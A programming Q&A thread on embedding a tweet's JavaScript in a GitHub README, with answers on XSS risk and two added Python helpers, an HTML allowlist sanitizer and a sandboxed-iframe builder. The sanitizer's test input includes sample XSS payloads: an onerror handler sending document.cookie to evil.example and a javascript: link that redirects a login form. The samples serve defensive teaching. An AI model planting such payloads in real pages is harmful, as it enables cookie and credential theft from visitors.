69

I want to embed a tweet in a GitHub README file. Markdown should support this; however, when I add the code copied from the tweet, the JavaScript doesn't get rendered.

Example:

```html
<blockquote>...</blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
```

Any ideas?

2
  • 1
    I'm not sure that you can embed JavaScript in Markdown. Commented Jan 24, 2014 at 19:26
  • You do realize that if I could embed JavaScript into this comment, I could go around looking for new questions, help you downvote a couple of questions, post a new question for you, change your name or profile picture, and get you banned, right? You think allowing any script on your website is a good idea? You'll more likely embed tweets by asking GitHub to enable Markdown embeds or something. Commented Feb 21, 2022 at 22:55

3 Answers

54

Allowing JavaScript from third parties directly on a website has huge XSS attack implications. Someone could use JavaScript code, for example, to grab the cookies associated with any visitor's GitHub account and forward them to a malicious entity.

There's also the nuisance potential, as having access to JavaScript means having access to the visitor's CPU and being able to do things like pop-ups or blinking text.

As such, it's natural that JavaScript isn't supported in READMEs. Markdown may have a way of doing it, but it'll never be allowed on a website like GitHub.

However, you can do it on your project's GitHub page, if you have one, since it doesn't belong to the main GitHub website and the domain is not the same.


4 Comments

Well, if you own the README, then why would you be protecting yourself from making blinking text? With that line of logic we should disable JavaScript on websites because the owner of the website might "be able to do things like pop-ups or blinking text".
JavaScript could also alter GitHub's login form's action so that logging in sends the user's credentials to your own malicious server. However, this could be mitigated by forcing JS to run inside an iframe, as D1plo1d suggested.
They recently allowed you to customize your profile home page, so I was trying to load a JavaScript game into it; source
The most you can do is create your own API, put the URL inside the README, and render a GIF, image, or text of your choice inside the README. But everything will be stuck in a sandbox, meaning that nothing from the user on the front end can be seen, except for the anonymous presence of the visitor at a certain time, which can be seen on the back end of your API. The advantage is that you can change the README content dynamically without having to edit it.
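What a host like GitHub does instead of rendering README HTML verbatim is run it through an allowlist sanitizer, which is why the `<script>` tag from the question disappears while the `<blockquote>` survives. The following is an added example, not GitHub's code or any library's: a minimal allowlist sanitizer built on Python's standard-library `HTMLParser`, with a hypothetical policy (the tag and attribute allowlist, the scheme list and the drop-with-content set are all assumptions), run over a constructed README fragment that combines the question's tweet embed with the two payloads this answer and its comments describe, cookie exfiltration and login-form tampering.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist policy, for illustration only; these are not GitHub's rules.
ALLOWED_TAGS = {"blockquote", "p", "a", "em", "strong", "code", "pre", "br", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}, "blockquote": {"cite"}}
URL_ATTRS = {"href", "src", "cite"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" covers relative and //host URLs
# Elements whose entire subtree is discarded, not just the tags themselves.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "form"}
VOID_TAGS = {"br", "img", "embed"}                # no end tag, so never nest-count them


def safe_url(value):
    """Reject javascript:, data:, vbscript: and friends. Browsers strip tab/CR/LF inside
    URLs before scheme detection, so strip them here too before looking at the scheme."""
    if value is None:
        return False
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").strip()
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; text is re-escaped on output.
    HTMLParser decodes entities in attribute values, so &#106;avascript: reaches
    safe_url as javascript:. Comments, doctypes and PIs are dropped by default."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0      # nesting depth inside a DROP_WITH_CONTENT element
        self.removed = []      # audit trail of what was stripped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.removed.append(f"<{tag}> (with content)")
            if tag not in VOID_TAGS:
                self.dropping += 1
            return
        if self.dropping:
            return
        if tag not in ALLOWED_TAGS:
            self.removed.append(f"<{tag}>")     # tag goes, its text content stays
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.removed.append(f"{tag}@{name}")        # catches every on* handler
                continue
            if name in URL_ATTRS and not safe_url(value):
                self.removed.append(f"{tag}@{name}={value!r}")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if tag not in VOID_TAGS and self.dropping:
                self.dropping -= 1
            return
        if self.dropping or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data))


def sanitize(fragment):
    """Return (clean_html, removed_items) for an untrusted HTML fragment."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.removed


# Constructed input: the tweet embed from the question plus two hostile additions
# of the kind the answer warns about (cookie exfiltration, login-form tampering).
README_HTML = (
    '<blockquote class="twitter-tweet"><p>Hello <a href="https://twitter.com/x">@x</a></p></blockquote>\n'
    '<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>\n'
    '<img src="x" onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">\n'
    '<a href="javascript:document.forms[0].action=\'https://evil.example/login\'">login</a>\n'
)

if __name__ == "__main__":
    clean, removed = sanitize(README_HTML)
    print(clean)
    print("stripped:", removed)
```

The sanitizer keeps the blockquote (minus its `class`, which the assumed policy does not allow), drops the `<script>` element with its content, strips the `onerror` handler from the image and empties the `javascript:` link, leaving `<a>login</a>`. The `removed` list is the part worth logging in a real pipeline: it tells you which inputs are probing the filter.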
17

As a follow-up to coyotte508's answer (sorry, not enough points to reply directly):

If GitHub were to enable such a feature, they could use iframes as an effective measure against XSS, in the same way ReadTheDocs does.

EDIT: Also, you might want to check out readthedocs.org as an alternative to a GitHub README.md. They support embedding JavaScript in rst files.
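The isolation the iframe approach relies on is the origin boundary: a script running in a frame served from another domain never receives the host's session cookies, and the `sandbox` attribute confines it further. As an added example, not ReadTheDocs's or GitHub's code, the helper below applies RFC 6265 cookie domain matching to refuse any embed host that would be sent a cookie scoped to the host's domain (the reason a `pages.github.com` frame would not help but a `github.io` one does), then emits a sandboxed iframe. The cookie domain `github.com`, the embed hostnames and the set of grantable sandbox tokens are constructed assumptions for illustration.

```python
import ipaddress
from html import escape
from urllib.parse import urlparse

# Sandbox tokens this helper is willing to grant (assumed policy, for illustration).
# allow-same-origin is acceptable only because the embed is forced onto another domain:
# it then grants the frame its own origin, never the host's.
GRANTABLE_TOKENS = {"allow-scripts", "allow-popups", "allow-forms", "allow-same-origin"}


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def cookie_domain_matches(request_host, cookie_domain):
    """RFC 6265 section 5.1.3: a cookie with Domain=cookie_domain is sent to request_host
    when the host equals it or is a subdomain of it (and the host is not an IP address)."""
    host = request_host.lower().rstrip(".")
    domain = cookie_domain.lower().lstrip(".").rstrip(".")
    if host == domain:
        return True
    return host.endswith("." + domain) and not _is_ip(host)


def isolated_embed(session_cookie_domain, embed_url, tokens=("allow-scripts",)):
    """Build an <iframe> for third-party content that must not see the host's session.
    Refuses any embed host to which the session cookie would be sent, any non-https
    source and any sandbox token outside the assumed policy."""
    src = urlparse(embed_url)
    if src.scheme != "https" or not src.hostname:
        raise ValueError("embed must be an absolute https URL")
    if cookie_domain_matches(src.hostname, session_cookie_domain):
        raise ValueError(
            f"{src.hostname} receives cookies scoped to {session_cookie_domain}; "
            "serve the embed from a separate domain"
        )
    unknown = set(tokens) - GRANTABLE_TOKENS
    if unknown:
        raise ValueError(f"refusing sandbox tokens: {sorted(unknown)}")
    sandbox = " ".join(sorted(tokens))
    return (
        f'<iframe src="{escape(embed_url, quote=True)}" sandbox="{sandbox}" '
        'referrerpolicy="no-referrer"></iframe>'
    )


def embed_allowed(session_cookie_domain, embed_url, tokens=("allow-scripts",)):
    """True if isolated_embed would accept this embed, False if it would refuse it."""
    try:
        isolated_embed(session_cookie_domain, embed_url, tokens)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed hostnames: a session cookie scoped to github.com, and two candidate
    # embed origins, one on the host's domain and one on a separate domain.
    print(isolated_embed("github.com", "https://user.github.io/tweet.html"))
    for url in ("https://pages.github.com/tweet.html", "http://user.github.io/tweet.html"):
        print(url, "->", "allowed" if embed_allowed("github.com", url) else "refused")
```

The domain check is the one that matters: `sandbox` without `allow-same-origin` already gives the frame an opaque origin, but a frame whose content is served from the host's own cookie domain still receives the session cookie in the request, so the check has to be made on where the content comes from, not only on which sandbox flags are set.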


1

I came here looking for this:

```js
function myFunction () {
   return true;
}
```
